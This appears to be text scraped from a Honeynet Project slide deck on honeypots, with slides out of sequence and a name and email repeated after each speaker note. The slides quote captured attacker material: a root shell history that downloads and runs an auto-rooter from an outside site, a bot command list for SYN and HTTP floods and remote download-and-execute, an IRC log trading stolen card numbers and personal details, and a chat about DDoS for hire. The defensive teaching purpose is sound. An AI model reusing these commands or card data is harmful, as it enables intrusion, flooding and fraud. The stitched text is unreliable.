Honeypot technology can detect known and unknown attacks by emulating services and systems. Honeyd is designed for Unix systems and can monitor all unused IP addresses simultaneously while only generating a small number of alerts. It can detect activity on any port or protocol.
75. DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
76.
77.
78.
79. The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
80.
81.
82.
83. Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
91. Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
Even more exciting is the ability to disable attacks by modifying the packet payload. Here we disable the DNS attack by replacing the exploit code with different values. Even if the exploit is successful, they will end up executing /ben/sh, which does not exist on any system. This creates a more realistic environment for attackers. They launch an attack and the victim responds, however the attack fails. The attacker most likely never know why it failed. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
This is the agenda we will be following for today. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
Keep in mind this statistical information was gathered during 2000-2001. We fully believe that the threats on the Internet are exponentially more active due to the release of highly automated tools, such as worms and auto-rooters. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
We believe this to be a Romanian blackhat that lives on the east coast. His handle is thought to be ‘Johnny17’. The Honeynet Project captured this real time video as one of our Honeynets was under attack. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
After one of our Honeynets was compromised with the dtspcd exploit, the system was used for the attackers to communicate with each other. This was part of their conversation. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
Honeynets can detect activity on any protocol, increasing their chances of detecting previously unknown attacks. For example, a Honeynet was recently compromised and a backdoor was placed on the system. The backdoor used encoded IP protocol 11 packets for communication. This is a covert channel between the hacker and the compromised system. The Honeynet detected and captured this anomalous traffic and allowed us to analyze the attacker’s actions. Above we see the encoded covert communications sent by the attacker to the honeypot. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
Feel free to contact the Honeynet Project with any idea, questions, or concerns you may have. If you are interested in learning more about information security in general, you can find books written by member of the Honeynet Project at http://www.honeynet.org/book/books.html Best of luck! --- The Honeynet Project --- Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)